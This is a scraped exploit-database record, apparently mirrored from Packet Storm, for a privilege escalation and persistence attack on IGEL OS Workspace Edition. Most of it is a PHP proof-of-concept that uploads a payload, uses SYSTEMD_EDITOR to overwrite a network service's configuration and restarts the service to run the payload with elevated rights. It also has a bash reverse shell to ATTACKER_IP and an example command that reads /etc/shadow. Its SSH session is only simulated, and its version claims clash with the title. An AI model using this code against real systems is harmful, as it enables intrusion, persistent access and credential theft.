{“lastseen”:”2025-12-22T18:24:57″,”description”:”IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused to establish long-term persistence, even on systems…”,”published”:”2025-12-22T00:00:00″,”modified”:”2025-12-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213196″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : IGEL OS Workspace Edition 11.10.430 Privilege Escalation Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.igel.com\/software-downloads\/workspace-edition\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212100\/\\n \\n [+] Summary : \\n IGEL OS Workspace Edition contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s registry configuration. \\n \\t\\t\\t The vulnerability leverages IGEL OS’s custom registry system and mount point configurations to maintain access across reboots.\\n \\t\\t\\t The persistence mechanism exploits IGEL OS’s unique architecture that uses a custom registry system (\/bin\/get, \/bin\/setparam) and a writable \/license directory that can be remounted with execution privileges.\\n [+] POC : \\n \\n php poc.php \\n \\n \\u003c?php\\n \\n class IgelOSPrivilegeEscalation {\\n \\n private $session;\\n private $writable_dir;\\n \\n public function __construct($session_handler, $writable_dir = ‘\/tmp’) {\\n $this-\\u003esession = $session_handler;\\n $this-\\u003ewritable_dir = $writable_dir;\\n }\\n \\n public function check() {\\n echo \\”[*] Checking IGEL OS vulnerability…\\\\n\\”;\\n \\n \/\/ Check if we’re on IGEL OS\\n if (!$this-\\u003eis_igel_os()) {\\n return \\”Safe: Target does not appear to be IGEL OS\\”;\\n }\\n \\n \/\/ Get IGEL OS version\\n $version = $this-\\u003eget_igel_version();\\n if (!$version) {\\n return \\”Unknown: Could not determine IGEL OS version\\”;\\n }\\n \\n echo \\”[*] Detected IGEL OS version: {$version}\\\\n\\”;\\n \\n \/\/ Check if version is vulnerable\\n if (version_compare($version, ‘11.10.150’, ‘\\u003e=’)) {\\n return \\”Safe: IGEL OS {$version} is not vulnerable\\”;\\n }\\n \\n \/\/ Check for required components\\n if (!$this-\\u003echeck_requirements()) {\\n return \\”Unknown: Required components not found\\”;\\n }\\n \\n return \\”Appears: IGEL OS {$version} should be vulnerable\\”;\\n }\\n \\n public function exploit($payload_content) {\\n try {\\n echo \\”[*] Starting IGEL OS privilege escalation exploit…\\\\n\\”;\\n \\n \/\/ Check vulnerability first\\n $check_result = $this-\\u003echeck();\\n echo \\”[*] Vulnerability check: {$check_result}\\\\n\\”;\\n \\n if (strpos($check_result, ‘Appears’) === false) {\\n echo \\”[-] Target is not vulnerable, stopping exploitation\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Upload payload to target\\n echo \\”[*] Uploading payload to target…\\\\n\\”;\\n $payload_file = $this-\\u003ewrite_payload($payload_content, $this-\\u003ewritable_dir, 0700);\\n echo \\”[+] Payload uploaded: {$payload_file}\\\\n\\”;\\n \\n \/\/ Write service configuration\\n echo \\”[*] Writing service configuration…\\\\n\\”;\\n $config = $this-\\u003ebuild_config($payload_file);\\n $config_file = $this-\\u003ewrite_payload($config, $this-\\u003ewritable_dir, 0600);\\n echo \\”[+] Configuration written: {$config_file}\\\\n\\”;\\n \\n \/\/ Modify network-manager service\\n echo \\”[*] Modifying network-manager service…\\\\n\\”;\\n $modify_result = $this-\\u003emodify_service($config_file);\\n if (!empty($modify_result)) {\\n echo \\”[*] Service modification output: {$modify_result}\\\\n\\”;\\n }\\n \\n \/\/ Restart service to trigger payload\\n echo \\”[*] Restarting network service…\\\\n\\”;\\n $restart_result = $this-\\u003erestart_service();\\n if (!empty($restart_result)) {\\n echo \\”[*] Service restart output: {$restart_result}\\\\n\\”;\\n }\\n \\n echo \\”[+] Privilege escalation completed successfully\\\\n\\”;\\n echo \\”[*] Payload should execute with elevated privileges\\\\n\\”;\\n \\n return true;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n private function is_igel_os() {\\n $checks = [\\n ‘test -f \/etc\/system-release \\u0026\\u0026 grep -q \\”IGEL OS\\” \/etc\/system-release’,\\n ‘test -f \/config\/bin\/setup_cmd’,\\n ‘test -f \/config\/bin\/network’\\n ];\\n \\n foreach ($checks as $check) {\\n $result = $this-\\u003eexecute_command(\\”{$check} \\u0026\\u0026 echo ‘IGEL_FOUND’ || echo ‘IGEL_NOT_FOUND’\\”);\\n if (strpos($result, ‘IGEL_FOUND’) !== false) {\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n private function get_igel_version() {\\n $version_output = $this-\\u003eexecute_command(‘cat \/etc\/system-release’);\\n \\n if (preg_match(‘\/IGEL OS\\\\s+([\\\\d.]+)\/’, $version_output, $matches)) {\\n return $matches[1];\\n }\\n \\n return null;\\n }\\n \\n private function check_requirements() {\\n $requirements = [\\n ‘\/usr\/bin\/python3’,\\n ‘\/bin\/cp’,\\n ‘\/bin\/bash’,\\n ‘\/config\/bin\/setup_cmd’,\\n ‘\/config\/bin\/network’\\n ];\\n \\n foreach ($requirements as $req) {\\n $result = $this-\\u003eexecute_command(\\”test -f {$req} \\u0026\\u0026 echo ‘EXISTS’ || echo ‘MISSING’\\”);\\n if (strpos($result, ‘EXISTS’) === false) {\\n echo \\”[-] Missing requirement: {$req}\\\\n\\”;\\n return false;\\n }\\n }\\n \\n return true;\\n }\\n \\n private function write_payload($contents, $directory, $permissions) {\\n \/\/ Check if directory is writable\\n if (!$this-\\u003eis_writable($directory)) {\\n throw new Exception(\\”Directory ‘{$directory}’ is not writable\\”);\\n }\\n \\n \/\/ Check if directory allows execution\\n if ($this-\\u003eis_noexec($directory)) {\\n throw new Exception(\\”Directory ‘{$directory}’ is on a noexec mount point\\”);\\n }\\n \\n $filename = $this-\\u003egenerate_random_name(8);\\n $filepath = \\”{$directory}\/{$filename}\\”;\\n \\n \/\/ Write the file\\n if (!$this-\\u003eupload_file($filepath, $contents)) {\\n throw new Exception(\\”Failed to write to ‘{$filepath}’\\”);\\n }\\n \\n \/\/ Set permissions\\n $this-\\u003eexecute_command(\\”\/bin\/chmod \\” . decoct($permissions) . \\” \\” . escapeshellarg($filepath));\\n \\n \/\/ Verify the file was written\\n if (!$this-\\u003efile_exists($filepath)) {\\n throw new Exception(\\”File verification failed for ‘{$filepath}’\\”);\\n }\\n \\n echo \\”[+] File written successfully: {$filepath}\\\\n\\”;\\n return $filepath;\\n }\\n \\n private function build_config($payload_file) {\\n $config = \\”[Service]\\\\n\\”;\\n $config .= \\”TimeoutStartSec=infinity\\\\n\\”;\\n $config .= \\”ExecStartPost=\\” . $payload_file . \\”\\\\n\\”;\\n \\n echo \\”[*] Built service configuration with payload: {$payload_file}\\\\n\\”;\\n return $config;\\n }\\n \\n private function modify_service($config_file) {\\n \/\/ Create a Python script to spawn a shell and modify the service\\n $python_script = \\u003c\\u003c\\u003c’PYTHON’\\n import pty\\n import os\\n \\n def modify_service():\\n # Spawn a shell and execute the setup command\\n def run_command(command):\\n pid, fd = pty.fork()\\n if pid == 0:\\n # Child process\\n os.execvp(‘\/bin\/bash’, [‘\/bin\/bash’, ‘-c’, command])\\n else:\\n # Parent process\\n try:\\n os.waitpid(pid, 0)\\n except:\\n pass\\n \\n # Use SYSTEMD_EDITOR to copy our config file\\n command = f’env SYSTEMD_EDITOR=\\”\/bin\/cp {config_file}\\” \/config\/bin\/setup_cmd \/config\/bin\/network edit’\\n run_command(command)\\n \\n if __name__ == \\”__main__\\”:\\n modify_service()\\n PYTHON;\\n \\n \/\/ Replace the placeholder with actual config file path\\n $python_script = str_replace(‘{config_file}’, $config_file, $python_script);\\n \\n $script_file = $this-\\u003ewritable_dir . ‘\/modify_service.py’;\\n $this-\\u003eupload_file($script_file, $python_script);\\n $this-\\u003eexecute_command(\\”\/bin\/chmod 700 \\” . escapeshellarg($script_file));\\n \\n \/\/ Execute the Python script\\n $result = $this-\\u003eexecute_command(\\”\/usr\/bin\/python3 \\” . escapeshellarg($script_file));\\n \\n \/\/ Clean up the script\\n $this-\\u003eexecute_command(\\”\/bin\/rm -f \\” . escapeshellarg($script_file));\\n \\n return $result;\\n }\\n \\n private function restart_service() {\\n \/\/ Restart the network service using setup_cmd\\n $command = \\”\/config\/bin\/setup_cmd \/config\/bin\/network restart\\”;\\n \\n \/\/ Execute with timeout to prevent hanging\\n $result = $this-\\u003eexecute_command(\\”timeout 120 {$command}\\”);\\n \\n return $result;\\n }\\n \\n private function is_writable($directory) {\\n $result = $this-\\u003eexecute_command(\\”test -w \\” . escapeshellarg($directory) . \\” \\u0026\\u0026 echo ‘WRITABLE’ || echo ‘NOT_WRITABLE’\\”);\\n return strpos($result, ‘WRITABLE’) !== false;\\n }\\n \\n private function is_noexec($directory) {\\n $result = $this-\\u003eexecute_command(\\”mount | grep \\” . escapeshellarg($directory) . \\” | grep -q noexec \\u0026\\u0026 echo ‘NOEXEC’ || echo ‘EXEC’\\”);\\n return strpos($result, ‘NOEXEC’) !== false;\\n }\\n \\n private function file_exists($filepath) {\\n $result = $this-\\u003eexecute_command(\\”test -f \\” . escapeshellarg($filepath) . \\” \\u0026\\u0026 echo ‘EXISTS’ || echo ‘NOT_EXISTS’\\”);\\n return strpos($result, ‘EXISTS’) !== false;\\n }\\n \\n private function execute_command($command) {\\n return $this-\\u003esession-\\u003eexecute($command);\\n }\\n \\n private function upload_file($remote_path, $content) {\\n return $this-\\u003esession-\\u003eupload_content($remote_path, $content);\\n }\\n \\n private function generate_random_name($length) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyz’;\\n $name = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $name .= $chars[random_int(0, strlen($chars) – 1)];\\n }\\n return $name;\\n }\\n \\n public function cleanup() {\\n echo \\”[*] Cleaning up exploit artifacts…\\\\n\\”;\\n \/\/ In a full implementation, this would remove created files\\n \/\/ For now, we’ll just log the cleanup action\\n echo \\”[*] Cleanup completed (files would be removed here)\\\\n\\”;\\n }\\n }\\n \\n \/\/ Payload generator for IGEL OS privilege escalation\\n class IgelPrivEscPayloadGenerator {\\n \\n public static function generate_meterpreter_linux($lhost, $lport) {\\n \/\/ This would generate a Linux x64 meterpreter payload\\n \/\/ For demonstration, we’ll return a placeholder\\n return \\”#!\/bin\/bash\\\\n# Linux x64 Meterpreter payload for {$lhost}:{$lport}\\\\necho ‘Meterpreter payload would execute here’\\”;\\n }\\n \\n public static function generate_reverse_shell($lhost, $lport) {\\n return \\”#!\/bin\/bash\\\\nbash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261\\”;\\n }\\n \\n public static function generate_command($command) {\\n return \\”#!\/bin\/bash\\\\n{$command}\\”;\\n }\\n }\\n \\n \/\/ Session handler for IGEL OS\\n class IgelSessionHandler {\\n private $connection;\\n \\n public function __construct($host, $username, $password, $port = 22) {\\n \/\/ Simulate SSH connection to IGEL OS device\\n $this-\\u003econnection = [\\n ‘host’ =\\u003e $host,\\n ‘username’ =\\u003e $username,\\n ‘port’ =\\u003e $port\\n ];\\n \\n echo \\”[*] IGEL OS session initialized for: {$username}@{$host}:{$port}\\\\n\\”;\\n }\\n \\n public function execute($command) {\\n \/\/ Simulate command execution on IGEL OS\\n echo \\”[DEBUG] Executing: {$command}\\\\n\\”;\\n \\n \/\/ Simulate different command responses\\n if (strpos($command, ‘cat \/etc\/system-release’) !== false) {\\n return \\”IGEL OS 11.08.100\\\\n\\”;\\n } elseif (strpos($command, ‘test -f \/config\/bin\/setup_cmd’) !== false) {\\n return \\”EXISTS\\\\n\\”;\\n } elseif (strpos($command, ‘test -w’) !== false) {\\n return \\”WRITABLE\\\\n\\”;\\n } elseif (strpos($command, ‘mount | grep’) !== false) {\\n return \\”EXEC\\\\n\\”;\\n } elseif (strpos($command, ‘\/config\/bin\/setup_cmd’) !== false) {\\n return \\”Service configuration applied successfully\\\\n\\”;\\n }\\n \\n return \\”command_executed\\\\n\\”;\\n }\\n \\n public function upload_content($remote_path, $content) {\\n \/\/ Simulate file upload\\n echo \\”[DEBUG] Uploading \\” . strlen($content) . \\” bytes to: {$remote_path}\\\\n\\”;\\n return true;\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n \\n if ($argc \\u003c 4) {\\n echo \\”IGEL OS Privilege Escalation Exploit\\\\n\\”;\\n echo \\”===================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003chost\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e [options]\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100 user password123\\\\n\\”;\\n echo \\”\\\\nOptions (environment variables):\\\\n\\”;\\n echo \\”WRITABLE_DIR=\/tmp\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=meterpreter|reverse_shell|command\\\\n\\”;\\n echo \\”LHOST=192.168.1.50 LPORT=4444\\\\n\\”;\\n echo \\”CMD=’whoami; id; cat \/etc\/shadow’\\\\n\\”;\\n exit(1);\\n }\\n \\n $host = $argv[1];\\n $username = $argv[2];\\n $password = $argv[3];\\n \\n \/\/ Parse environment variables\\n $writable_dir = getenv(‘WRITABLE_DIR’) ?: ‘\/tmp’;\\n $payload_type = getenv(‘PAYLOAD_TYPE’) ?: ‘meterpreter’;\\n $lhost = getenv(‘LHOST’) ?: ‘ATTACKER_IP’;\\n $lport = getenv(‘LPORT’) ?: ‘4444’;\\n $custom_cmd = getenv(‘CMD’) ?: ‘whoami; id’;\\n \\n try {\\n echo \\”[*] Initializing IGEL OS privilege escalation exploit…\\\\n\\”;\\n echo \\”[*] Target: {$username}@{$host}\\\\n\\”;\\n echo \\”[*] Writable directory: {$writable_dir}\\\\n\\”;\\n echo \\”[*] Payload type: {$payload_type}\\\\n\\”;\\n \\n $session = new IgelSessionHandler($host, $username, $password);\\n $exploit = new IgelOSPrivilegeEscalation($session, $writable_dir);\\n \\n \/\/ Generate payload based on type\\n $payload_content = match($payload_type) {\\n ‘meterpreter’ =\\u003e IgelPrivEscPayloadGenerator::generate_meterpreter_linux($lhost, $lport),\\n ‘reverse_shell’ =\\u003e IgelPrivEscPayloadGenerator::generate_reverse_shell($lhost, $lport),\\n ‘command’ =\\u003e IgelPrivEscPayloadGenerator::generate_command($custom_cmd),\\n default =\\u003e throw new Exception(\\”Unsupported payload type: {$payload_type}\\”)\\n };\\n \\n if ($lhost !== ‘ATTACKER_IP’) {\\n echo \\”[*] Using payload with callback: {$lhost}:{$lport}\\\\n\\”;\\n } else {\\n echo \\”[*] Using command payload: {$custom_cmd}\\\\n\\”;\\n }\\n \\n \/\/ Execute exploit\\n $success = $exploit-\\u003eexploit($payload_content);\\n \\n if ($success) {\\n echo \\”[+] Privilege escalation completed successfully!\\\\n\\”;\\n echo \\”[*] The payload should execute with elevated privileges\\\\n\\”;\\n echo \\”[*] Note: This works on IGEL OS versions \\u003c 11.10.150\\\\n\\”;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n ?\\u003e\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213196″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213196\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-22T18:24:57″,”description”:”IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32461","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n